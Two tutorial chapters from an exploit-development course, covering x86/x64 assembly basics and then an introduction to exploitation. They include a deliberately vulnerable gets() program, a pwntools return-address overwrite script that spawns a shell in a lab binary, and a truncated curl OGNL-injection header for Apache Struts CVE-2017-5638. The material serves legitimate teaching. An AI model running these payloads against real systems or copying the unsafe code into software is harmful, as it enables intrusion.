x86 and x64 Assembly from Scratch

🎯 Objective

To gain a deep, foundational understanding of how x86 and x64 assembly work, from CPU registers and calling conventions to memory addressing and function calls. This is critical for exploit developers who need precise control over memory, registers, and the instruction pointer.


1. Why Learn Assembly for Exploitation?

Exploit developers operate close to the metal, at the point where programming languages are compiled into instructions the CPU can directly understand. Memory corruptions, ROP chains, shellcode, and low-level payloads require understanding register state, stack layout, and control flow.

In exploit development:

  • You overwrite a saved return address or function pointer to control EIP or RIP
  • You pivot the stack (ESP or RSP)
  • You inject shellcode and need to place arguments in registers or memory
  • You must understand how values are passed and returned at the assembly level

2. Architecture Overview: x86 vs x64

2.1 x86 (32-bit)

  • 4-byte registers (e.g., eax, ebx)
  • 4GB virtual address space
  • Arguments passed via stack
  • Used in legacy applications or 32-bit systems

2.2 x64 (64-bit)

  • 8-byte registers (rax, rbx)
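  • 64-bit pointers, more addressable memory (2^64 bytes, about 18 exabytes, in theory; current CPUs typically implement 48-bit virtual addresses)
  • First arguments passed in registers (Windows: rcx, rdx, r8, r9; Linux/System V: rdi, rsi, rdx, rcx, r8, r9)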
  • Return values in rax

2.3 Register Subdivisions

Example (x64):

Register:         rax (64-bit)
 └── eax (32-bit, low half of rax)
     └── ax (16-bit, low half of eax)
         ├── ah (8-bit high)
         └── al (8-bit low)
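The aliasing above can be sketched with masks and shifts. This is a minimal Python model, not real register access; the value in rax and the helper names write_al and write_eax are illustrative assumptions. It also shows one x64 detail worth knowing: writing a 32-bit sub-register clears the upper half of the 64-bit register, while writing an 8-bit or 16-bit sub-register leaves the other bits alone.

```python
# Model the sub-register views of a 64-bit value using masks and shifts.
rax = 0x1122334455667788      # arbitrary example value

eax = rax & 0xFFFFFFFF        # low 32 bits
ax = rax & 0xFFFF             # low 16 bits
ah = (rax >> 8) & 0xFF        # bits 8-15
al = rax & 0xFF               # bits 0-7


def write_al(reg64, value):
    """Writing al replaces only the low byte; all other bits are preserved."""
    return (reg64 & ~0xFF) | (value & 0xFF)


def write_eax(reg64, value):
    """In 64-bit mode, writing eax zero-extends into rax (upper 32 bits cleared)."""
    return value & 0xFFFFFFFF


print(hex(eax), hex(ax), hex(ah), hex(al))
print(hex(write_al(rax, 0xFF)))
print(hex(write_eax(rax, 0xDEADBEEF)))
```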


3. Register Classifications

Class           | Registers (x86/x64)                     | Description
General-purpose | eax, ebx, ecx, edx / rax, rbx, rcx, rdx | Arithmetic, logic, data movement
Stack-related   | esp, ebp / rsp, rbp                     | Stack pointer/base pointer
Instruction     | eip / rip                               | Holds address of next instruction
Flags           | eflags / rflags                         | Status indicators (ZF, CF, SF)
Segment         | cs, ds, es, ss, fs, gs                  | Rare in userland, used in kernel
SIMD/FPU        | xmm0–xmm15, st0–st7, mm0–mm7            | Vector ops, floating point, MMX

4. Instruction Types and Syntax (Intel Style)

4.1 Syntax Format

instruction destination, source

4.2 Common Instructions

Category   | Example                 | Meaning
Data Move  | mov eax, ebx            | Copy ebx to eax
Arithmetic | add eax, 4              | eax += 4
Logical    | and eax, 0xFF           | Clear all but lower byte
Shift      | shr eax, 1              | Logical shift right by 1 (unsigned divide by 2)
Stack      | push ebp, pop eax       | Push a value onto the stack / pop a value off it
Control    | call, ret, jmp, je, jne | Control flow

5. Addressing Modes and Operand Types

5.1 Addressing Types

Mode            | Syntax                                         | Example
Immediate       | Constant value                                 | mov eax, 1
Register        | CPU register                                   | mov eax, ebx
Direct Memory   | Absolute address                               | mov eax, [0x12345678]
Indirect Memory | Register pointer                               | mov eax, [ebx]
Indexed         | Base + displacement (optionally + index*scale) | mov eax, [ebp+4]
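Every memory operand resolves to one effective address of the form base + index*scale + displacement. The sketch below computes it in Python; the function name effective_address and all addresses are hypothetical values chosen for illustration.

```python
def effective_address(base=0, index=0, scale=1, disp=0, bits=32):
    """Compute base + index*scale + disp, wrapped to the address width."""
    if scale not in (1, 2, 4, 8):
        raise ValueError("x86 only encodes scale factors 1, 2, 4 and 8")
    return (base + index * scale + disp) & ((1 << bits) - 1)


ebp = 0xBFFFF000          # hypothetical frame pointer
table = 0x08049000        # hypothetical array of 4-byte entries

print(hex(effective_address(base=ebp, disp=4)))               # [ebp+4]
print(hex(effective_address(base=ebp, disp=-8)))              # [ebp-8]
print(hex(effective_address(base=table, index=3, scale=4)))   # [ebx+esi*4]
```

Negative displacements such as [ebp-8] are how local variables are usually reached, while positive ones such as [ebp+8] reach stack arguments in 32-bit code.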

5.2 Operand Sizes

  • BYTE PTR [mem]: 8-bit
  • WORD PTR [mem]: 16-bit
  • DWORD PTR [mem]: 32-bit
  • QWORD PTR [mem]: 64-bit
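To see what the size prefixes mean in practice, the following sketch reads the same eight bytes at each width using Python's struct module. The byte values are made up for illustration, and the reads assume little-endian order, as on x86.

```python
import struct

# Eight bytes as they would sit in memory, lowest address first.
memory = bytes([0x78, 0x56, 0x34, 0x12, 0xEF, 0xCD, 0xAB, 0x90])

byte_val = struct.unpack_from("<B", memory)[0]    # BYTE PTR  [mem]
word_val = struct.unpack_from("<H", memory)[0]    # WORD PTR  [mem]
dword_val = struct.unpack_from("<I", memory)[0]   # DWORD PTR [mem]
qword_val = struct.unpack_from("<Q", memory)[0]   # QWORD PTR [mem]

for name, value in [("byte", byte_val), ("word", word_val),
                    ("dword", dword_val), ("qword", qword_val)]:
    print(f"{name:5} {value:#x}")
```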

6. Memory Layout and Stack Anatomy

Typical process memory layout (simplified, 32-bit, highest address at the top):

0xFFFFFFFF  ← Stack Top (grows down)
     |
     | Stack (local vars, return addr)
     |
     | Heap (malloc/calloc/free - grows up)
     |
     | BSS (uninitialized globals)
     |
     | Data (initialized globals)
     |
     | Text (code, .text segment - executable)
0x00000000  ← Null page


7. Calling Conventions

7.1 cdecl (x86 Linux default)

  • Arguments pushed right-to-left
  • Return value in eax
  • Caller cleans stack

7.2 stdcall (Windows APIs)

  • Callee cleans stack

7.3 fastcall (Microsoft optimized)

  • Some args in registers (e.g., ecx, edx)

7.4 System V AMD64 ABI (Linux x64)

Argument | Register
arg1     | rdi
arg2     | rsi
arg3     | rdx
arg4     | rcx
arg5     | r8
arg6     | r9
  • Return: rax

7.5 Windows x64 Calling Convention

Argument | Register
arg1     | rcx
arg2     | rdx
arg3     | r8
arg4     | r9
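The two x64 conventions differ mainly in which registers carry the leading arguments. As a rough sketch covering integer and pointer arguments only (floating-point arguments use xmm registers and are ignored here), the hypothetical helper place_args below shows where each argument would land.

```python
SYSV_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]   # System V AMD64 (Linux)
WIN64_REGS = ["rcx", "rdx", "r8", "r9"]                # Windows x64


def place_args(args, convention):
    """Return (register assignments, stack-passed arguments in argument order)."""
    regs = {"sysv": SYSV_REGS, "win64": WIN64_REGS}[convention]
    in_regs = dict(zip(regs, args))
    on_stack = list(args[len(regs):])
    return in_regs, on_stack


print(place_args([10, 20, 30, 40, 50, 60, 70], "sysv"))
print(place_args([10, 20, 30, 40, 50], "win64"))
```

This matters when building ROP chains: calling a three-argument function on Linux x64 means loading rdi, rsi, and rdx, whereas on Windows x64 the same call needs rcx, rdx, and r8.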

8. Function Prologue and Epilogue

x86 Example

push ebp
mov ebp, esp
sub esp, XX         ; allocate space
...
mov esp, ebp
pop ebp
ret

Why It Matters

  • Stack frames are key for local variables
  • Exploits often overwrite saved EIP/RIP on stack
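The prologue and epilogue can be traced with a toy stack model. This is a simplified Python simulation, not an emulator; the class Stack32 and every address in it are assumptions for illustration. It shows why the saved return address ends up at [ebp+4], just above the saved frame pointer and the locals.

```python
class Stack32:
    """Toy 32-bit stack: a dict of address -> value plus an esp register."""

    def __init__(self, esp):
        self.esp = esp
        self.mem = {}

    def push(self, value):
        self.esp -= 4                 # the stack grows toward lower addresses
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4
        return value


stack = Stack32(esp=0xBFFFF100)
ebp = 0xBFFFF200                      # caller's frame pointer (arbitrary)

stack.push(0x08048456)                # call: pushes the return address
stack.push(ebp)                       # push ebp
ebp = stack.esp                       # mov ebp, esp
stack.esp -= 0x10                     # sub esp, 0x10 (space for locals)

saved_ebp = stack.mem[ebp]            # [ebp]   = caller's ebp
return_addr = stack.mem[ebp + 4]      # [ebp+4] = saved return address

stack.esp = ebp                       # mov esp, ebp
ebp = stack.pop()                     # pop ebp
eip = stack.pop()                     # ret: pops the return address into eip

print(hex(saved_ebp), hex(return_addr), hex(eip), hex(stack.esp))
```

If a local buffer below ebp is overrun, the write moves upward through the saved ebp and then the value that ret will load into eip.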

9. Flags Register (EFLAGS/RFLAGS)

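Flag            | Meaning
ZF (Zero Flag)  | Set if result is 0
CF (Carry Flag) | Set if an unsigned carry or borrow occurred
SF (Sign Flag)  | Set if the result is negative (most significant bit set)
OF (Overflow)   | Set if signed overflow occurred
PF (Parity)     | Set if the low byte of the result has an even number of 1 bits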

Used with:

  • cmp, test (set the flags without storing a result)
  • je/jz, jne/jnz, jg, jl (branch based on the flags)
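As a worked example, the sketch below computes the flags that cmp a, b (an a - b subtraction whose result is discarded) would produce for 32-bit operands. The function name flags_after_cmp is an illustrative assumption, and only the five flags listed above are modeled.

```python
MASK32 = 0xFFFFFFFF


def sign_bit(value):
    """Most significant bit of a 32-bit value."""
    return (value >> 31) & 1


def flags_after_cmp(a, b):
    """Flags as set by `cmp a, b` (computes a - b) on 32-bit operands."""
    a &= MASK32
    b &= MASK32
    result = (a - b) & MASK32
    return {
        "ZF": int(result == 0),
        "CF": int(a < b),                                   # unsigned borrow
        "SF": sign_bit(result),
        "OF": int(sign_bit(a) != sign_bit(b)
                  and sign_bit(result) != sign_bit(a)),     # signed overflow
        "PF": int(bin(result & 0xFF).count("1") % 2 == 0),  # low byte only
    }


print(flags_after_cmp(5, 5))            # equal: je/jz would be taken
print(flags_after_cmp(3, 5))            # SF != OF: jl would be taken
print(flags_after_cmp(0x80000000, 1))   # most negative value minus 1
```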

10. Interrupts and Syscalls

Linux (x86):

mov eax, 1   ; syscall number: exit
mov ebx, 0   ; exit code
int 0x80     ; software interrupt

Linux (x64):

mov rax, 60  ; syscall: exit
mov rdi, 0   ; exit code
syscall


11. Loop and String Instructions

Looping

mov ecx, 10
loop_label:
; code
loop loop_label  ; decrements ecx, jumps if ecx != 0
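One detail of loop is easy to miss: the counter is decremented before it is tested, so the body always runs at least once. The Python sketch below counts body executions; run_loop is a hypothetical helper, and its bits parameter exists only so the wraparound case can be shown with a small counter.

```python
def run_loop(ecx, bits=32):
    """Count how many times the body runs for: label: <body>; loop label."""
    mask = (1 << bits) - 1
    iterations = 0
    while True:
        iterations += 1           # the loop body executes
        ecx = (ecx - 1) & mask    # loop decrements the counter first...
        if ecx == 0:              # ...and falls through once it reaches 0
            break
    return iterations


print(run_loop(10))          # counter starts at 10
print(run_loop(0, bits=8))   # counter starts at 0 and wraps around
```

With a real 32-bit ecx of 0 on entry, the counter wraps to 0xFFFFFFFF and the body runs 2^32 times, which is why compilers usually guard such loops with a jecxz check.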

String Instructions (with REP prefix)

  • movsb, movsw, movsd
  • cmpsb, stosb, scasb, lodsb
  • rep, repe, repne
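The rep prefix repeats a string instruction ecx times, advancing the pointer registers after each step. Below is a minimal Python model of rep movsb and rep stosb over a bytearray, assuming the direction flag is clear (pointers increment); the function names and buffer contents are illustrative.

```python
def rep_movsb(mem, esi, edi, ecx):
    """Copy ecx bytes from mem[esi] to mem[edi], one byte per step (DF = 0)."""
    while ecx != 0:
        mem[edi] = mem[esi]
        esi += 1
        edi += 1
        ecx -= 1
    return esi, edi, ecx


def rep_stosb(mem, edi, ecx, al):
    """Store the byte in al to mem[edi] ecx times (DF = 0)."""
    while ecx != 0:
        mem[edi] = al & 0xFF
        edi += 1
        ecx -= 1
    return edi, ecx


mem = bytearray(b"Hello!" + bytes(10))          # 16 bytes of toy memory
regs_after_copy = rep_movsb(mem, esi=0, edi=8, ecx=6)
regs_after_fill = rep_stosb(mem, edi=0, ecx=4, al=0x41)
print(mem, regs_after_copy, regs_after_fill)
```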

12. Writing Inline Assembly in C

int a = 5, b = 3, result;
__asm__(
    "movl %1, %%eax;"
    "addl %2, %%eax;"
    "movl %%eax, %0;"
    : "=r"(result)
    : "r"(a), "r"(b)
    : "%eax"
);


13. Compiling and Running Pure Assembly

hello.asm (NASM + Linux)

section .data
    msg db "Hello!", 0xA
    len equ $ - msg

section .text
    global _start

_start:
    mov eax, 4
    mov ebx, 1
    mov ecx, msg
    mov edx, len
    int 0x80

    mov eax, 1
    xor ebx, ebx
    int 0x80

nasm -f elf hello.asm
ld -m elf_i386 hello.o -o hello
./hello


14. Reverse Engineering and Disassembly

Use objdump, GDB, Ghidra, or radare2:

objdump -d -M intel binary   # -M intel selects Intel syntax (objdump defaults to AT&T)
gdb ./binary

Look for:

  • Function prologue: push ebp; mov ebp, esp
  • Function calls: call 0x08048400
  • Stack usage: mov eax, [ebp+0x8]

15. Tools and Emulators

Tool                | Use
NASM                | Write x86 ASM
GDB + Pwndbg        | Debugging
x64dbg              | Windows reversing
Godbolt             | C to Assembly
Ghidra              | Disassembler
Radare2             | RE suite
Online x86 Emulator | Run x86 code in browser

✅ Summary

  • Assembly allows direct control of CPU and memory.
  • Key registers (eax, esp, eip) are critical for understanding control flow and payload placement.
  • Stack frames, calling conventions, and memory addressing are the basis of buffer overflows and ROP chains.
  • Tools like NASM, GDB, x64dbg, and Ghidra will help analyze and write exploits.

What is Exploit Development?

"Understanding the art of turning bugs into code execution"

🎯 Objective

To build a comprehensive understanding of what exploit development is, its goals, classifications, and how attackers leverage vulnerabilities to hijack program execution. This chapter covers vulnerability classes, real-world scenarios, memory manipulation techniques, and low-level primitives that form the core of exploitation.


1.1 What is an Exploit?

An exploit is a crafted input, payload, or sequence of interactions that takes advantage of a vulnerability in software to achieve unintended behavior, usually with malicious or unauthorized intent.

These behaviors may include:

  • Executing arbitrary code
  • Reading or writing sensitive memory
  • Causing a crash (Denial of Service)
  • Escalating privileges
  • Bypassing application logic

Example

// vulnerable.c
#include <stdio.h>

int main() {
    char buffer[100];
    gets(buffer); // vulnerable to buffer overflow
    printf("You entered: %s\n", buffer);
    return 0;
}

If buffer is overrun, the return address on the stack can be overwritten, causing the program to jump to attacker-controlled code.
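The overwrite can be modeled without running any native code. In this Python sketch the stack frame is a bytearray laid out as buffer, saved rbp, return address. That layout, the addresses, and the helper unsafe_copy are simplifying assumptions; real compilers may insert padding between these fields.

```python
import struct

BUF_SIZE = 100

# Simplified x64 frame: [buffer (100 bytes)][saved rbp (8)][return address (8)]
frame = bytearray(BUF_SIZE + 16)
struct.pack_into("<Q", frame, BUF_SIZE, 0x7FFFFFFFE000)   # saved rbp (made up)
struct.pack_into("<Q", frame, BUF_SIZE + 8, 0x401136)     # legitimate return address (made up)


def unsafe_copy(frame, data):
    """Like gets(): copies the input without checking it against the buffer size."""
    frame[0:len(data)] = data


# 100 bytes fill the buffer, 8 more cover saved rbp, the last 8 replace the return address.
attacker_input = b"A" * (BUF_SIZE + 8) + struct.pack("<Q", 0x4141414142424242)
unsafe_copy(frame, attacker_input)

return_address = struct.unpack_from("<Q", frame, BUF_SIZE + 8)[0]
print(hex(return_address))
```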


1.2 Exploit vs Payload vs Shellcode

Term      | Description
Exploit   | The method of taking control (e.g., stack buffer overflow, use-after-free)
Payload   | The action performed once control is gained (e.g., spawn shell, reverse shell)
Shellcode | Compact machine code payload, usually to open a shell or call system functions

1.3 Exploitation Workflow

  1. Discovery – Identify the vulnerability
  2. Analysis – Reverse engineer the bug
  3. Trigger – Create the condition to exploit it
  4. Control – Gain instruction pointer (IP) control
  5. Payload Execution – Run arbitrary code or commands
  6. Post-Exploitation – Escalate privileges, persist, exfiltrate data

1.4 Exploitation Goals

Goal                   | Explanation
Code Execution         | Execute arbitrary shellcode, malware, or system calls
Privilege Escalation   | Elevate from user → admin/root/system
Information Disclosure | Leak memory (e.g., ASLR bypass, passwords)
Denial of Service      | Crash system/service
Persistence            | Survive reboots, re-infections
Evasion                | Avoid AV, EDR, and logging tools

1.5 Exploit Types (By Technique)

Memory Corruption-Based

  • Stack Buffer Overflow
    Overwriting return address on the stack.
  • Heap Overflow
    Overwriting heap structures to gain arbitrary write or control flow.
  • Use-After-Free (UAF)
    Using memory after it has been freed; attacker reallocates it with malicious data.
  • Double Free
    Two free() calls on the same pointer can corrupt heap metadata.
  • Format String Bug
    Using uncontrolled format strings like printf(user_input) leads to arbitrary read/write.
  • Integer Overflow/Underflow
    Bypass size checks, leading to incorrect memory allocations.
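The integer overflow case is the least intuitive of these, so here is a small worked example. It mimics a 32-bit size computation of count * elem_size in Python; the function names and the chosen count are illustrative assumptions.

```python
MAX_U32 = 0xFFFFFFFF


def alloc_size_32(count, elem_size):
    """Size as an unchecked 32-bit unsigned multiply would compute it."""
    return (count * elem_size) & MAX_U32


def checked_alloc_size_32(count, elem_size):
    """Same computation, but rejecting results that do not fit in 32 bits."""
    total = count * elem_size
    if total > MAX_U32:
        raise OverflowError("allocation size overflows 32 bits")
    return total


count = 0x40000001            # attacker-controlled element count
elem_size = 4
size = alloc_size_32(count, elem_size)
print(size)                   # bytes actually requested from the allocator
```

The allocator is asked for only a few bytes, yet later code that trusts count will write far past the end of that allocation, turning the arithmetic bug into a heap overflow.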

Logical Vulnerabilities

  • Race Conditions
    Timing issues in multithreaded environments.
  • Improper Access Control
    Missing authentication or authorization checks.
  • Insecure Deserialization
    Arbitrary object creation from untrusted data.

1.6 Real Exploitation Example

Here's a simple Linux example of stack-based control hijacking.

vulnerable.c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void secret() {
    printf("PWNED! Code execution achieved!\n");
    system("/bin/sh");
}

void vulnerable() {
    char buffer[64];
    printf("Enter input: ");
    gets(buffer); // unsafe
}

int main() {
    vulnerable();
    return 0;
}

Compile with protections disabled:

gcc vulnerable.c -o vuln -fno-stack-protector -z execstack -no-pie

Exploitation Steps

  1. Overflow buffer and overwrite return address
  2. Redirect execution to secret()
  3. Shell spawned

You can use Pwntools to automate the attack:

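from pwn import *

elf = context.binary = ELF('./vuln')  # also sets arch and endianness for p64()
p = process(elf.path)

# 64-byte buffer + 8-byte saved rbp = 72 bytes to the return address
# (typical for this x64 build; confirm the offset in a debugger)
payload = b'A' * 72
payload += p64(elf.symbols['secret'])

p.sendlineafter(b'Enter input: ', payload)  # bytes, not str, under Python 3
p.interactive()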
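For readers without Pwntools installed, the payload itself is simple to reproduce with the standard library. This sketch builds the same byte layout; build_payload is a hypothetical helper, and 0x401156 is a placeholder address, not the real location of secret() in any particular build.

```python
import struct


def build_payload(offset, target_addr):
    """Padding up to the saved return address, then the new address (little-endian, 8 bytes)."""
    return b"A" * offset + struct.pack("<Q", target_addr)


SECRET_ADDR = 0x401156        # placeholder; read the real value from the binary's symbols
payload = build_payload(72, SECRET_ADDR)

print(len(payload))
print(payload[72:].hex())
```

struct.pack("<Q", ...) does the same job as p64() here: it encodes the address as eight little-endian bytes so it lands in memory in the order the CPU expects.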


1.7 Common Exploit Development Toolset

Tool              | Purpose                              | Link
GDB               | Debugging on Linux                   | https://www.gnu.org/software/gdb/
Pwndbg            | GDB plugin for exploit dev           | https://github.com/pwndbg/pwndbg
Pwntools          | Python framework for writing exploits | https://github.com/Gallopsled/pwntools
x64dbg            | Windows GUI debugger                 | https://x64dbg.com/
Immunity Debugger | SEH exploit development              | https://www.immunityinc.com/products/debugger/
IDA Pro / Ghidra  | Reverse engineering                  | https://ghidra-sre.org/
ROPgadget         | ROP chain finder                     | https://github.com/JonathanSalwan/ROPgadget
Mona.py           | ROP + exploit helper for Immunity    | https://github.com/corelan/mona
Radare2           | Binary analysis CLI tool             | https://rada.re/n/
msfvenom          | Shellcode & payload generator        | https://docs.metasploit.com/

1.8 Architectural Concepts

  • Registers
    • x86: eax, ebx, esp, ebp, eip
    • x64: rax, rbx, rsp, rbp, rip
  • Calling Conventions
    • cdecl (caller cleans up stack)
    • stdcall (callee cleans up stack)
    • fastcall, sysv, Windows x64 (RCX, RDX, R8, R9)
  • Endianness
    • Most systems are little-endian (e.g., 0xdeadbeef stored as ef be ad de)
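Byte order is easy to check directly. The snippet below encodes 0xdeadbeef both ways with Python's built-in int.to_bytes; the variable names are illustrative.

```python
value = 0xDEADBEEF

little = value.to_bytes(4, "little")   # byte order in memory on x86/x64
big = value.to_bytes(4, "big")         # byte order as the number is written

print(little.hex(" "))
print(big.hex(" "))

# Reading the little-endian bytes back gives the original value.
round_trip = int.from_bytes(little, "little")
```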

1.9 Operating System Security Mechanisms

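Mitigation            | Description
DEP / NX              | Marks stack and heap pages non-executable
ASLR                  | Randomizes memory layout (stack, heap, libraries)
Stack Cookies         | Canary values placed before the saved return address to detect buffer overflows
SEH (SafeSEH / SEHOP) | Validation of Structured Exception Handling chains (Windows)
SMEP / KASLR          | Kernel protections: SMEP blocks kernel-mode execution of user pages, KASLR randomizes the kernel layout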

We will cover bypass techniques for these later in:

  • Return Oriented Programming (ROP)
  • ret2libc
  • Shellcode relocation
  • Heap grooming

1.10 Real-World Exploit Example (CVE)

CVE-2017-5638 – Apache Struts2 RCE

  • Vulnerability: Crafted Content-Type header triggers OGNL injection.
  • Exploit: curl -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)...}" \ http://target.com/struts2-showcase/upload.action

Another: CVE-2017-0144 – EternalBlue

  • MS SMBv1 vulnerability
  • Used in WannaCry ransomware
  • Kernel-level remote exploit on Windows XP to Windows 7

Exploit development is highly sensitive and legally restricted when performed outside ethical boundaries.

Use only in:

  • Lab environments
  • Capture the Flag (CTF) competitions
  • Bug bounty programs
  • With explicit authorization

Unauthorized access or exploitation is illegal and unethical.


✅ Summary

  • An exploit is not just a payload but the entire logic and sequence required to hijack control flow.
  • Memory corruption (e.g., buffer overflow, UAF) is a primary class of vulnerabilities.
  • The exploitation process involves discovery, analysis, triggering the bug, gaining control of the instruction pointer, payload execution, and post-exploitation.
  • A good exploit developer is part developer, part reverse engineer, and part OS internals expert.
  • Modern defenses such as DEP, ASLR, and stack cookies require advanced techniques to bypass.